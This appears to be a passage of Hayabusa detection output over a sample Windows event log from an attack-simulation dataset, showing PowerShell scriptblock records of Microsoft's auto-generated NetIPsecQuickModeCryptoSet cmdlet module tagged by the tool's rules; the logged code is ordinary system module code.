[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -con",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.659 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = 
$MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent 
= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 
'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -con",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 
'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
